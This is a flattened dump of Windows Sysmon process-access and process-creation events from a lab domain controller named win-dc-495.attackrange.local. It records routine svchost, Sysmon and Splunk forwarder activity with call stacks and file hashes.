13:36:18.805{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:18.789{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:18.789{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:18.789{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.806{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8ED6-6005-9600-00000000A301}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:22.806{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.806{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:22.806{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.806{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:22.806{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.806{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:22.806{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.806{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:22.806{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.806{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8ED6-6005-9600-00000000A301}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.806{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8ED6-6005-9600-00000000A301}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.807{59A5CD1D-8ED6-6005-9600-00000000A301}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.807{59A5CD1D-8ED7-6005-9700-00000000A301}35003508C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8ED7-6005-9700-00000000A301}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:23.666{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:23.666{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:23.666{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:23.666{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
